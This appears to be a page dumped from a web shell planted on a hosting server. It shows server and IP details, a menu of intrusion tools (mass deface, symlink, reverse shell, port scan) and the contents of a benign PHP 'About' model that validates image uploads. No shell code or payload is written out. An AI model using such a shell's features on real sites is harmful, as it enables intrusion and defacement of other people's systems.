Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
construcciones
/
admin
/
app
/
Models
/
Viewing: About.php
<?php class About extends BaseModel { protected string $table = 'about_us'; protected array $fillable = [ 'title_part1', 'title_part2', 'description_p1', 'description_p2', 'stat1_value', 'stat1_title', 'stat2_value', 'stat2_title', 'stat3_value', 'stat3_title', 'main_image', 'status', 'updated_at', ]; public function getData(): array { $statement = $this->db->query('SELECT * FROM about_us WHERE id = 1 LIMIT 1'); return $statement->fetch() ?: []; } public function updateData(array $data): bool { $data['updated_at'] = date('Y-m-d H:i:s'); return $this->update(1, $data); } public function uploadMainImage(array $file, ?string $oldFile = null): ?string { if (empty($file['name']) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { return null; } $allowed = [ 'image/jpeg' => 'jpg', 'image/png' => 'png', 'image/webp' => 'webp', ]; $mime = mime_content_type($file['tmp_name']); if (!isset($allowed[$mime])) { return null; } $filename = 'about_' . date('YmdHis') . '_' . bin2hex(random_bytes(6)) . '.' . $allowed[$mime]; $directory = ROOT_PATH . '/storage/uploads/about'; $destination = $directory . '/' . $filename; if (!is_dir($directory)) { mkdir($directory, 0775, true); } if (!move_uploaded_file($file['tmp_name'], $destination)) { return null; } $this->deleteOldFile($oldFile); return 'storage/uploads/about/' . $filename; } public function validImage(array $file): bool { if (empty($file['name'])) { return true; } if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { return false; } $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); if (in_array($extension, ['php', 'js', 'html', 'svg', 'phtml', 'phar'], true)) { return false; } return in_array(mime_content_type($file['tmp_name']), ['image/jpeg', 'image/png', 'image/webp'], true); } private function deleteOldFile(?string $oldFile): void { if (!$oldFile) { return; } $path = ROOT_PATH . '/' . ltrim($oldFile, '/'); $base = realpath(ROOT_PATH . '/storage/uploads/about'); $target = realpath($path); if ($base && $target && str_starts_with($target, $base) && is_file($target)) { unlink($target); } } }
Coded With 💗 by
0x6ick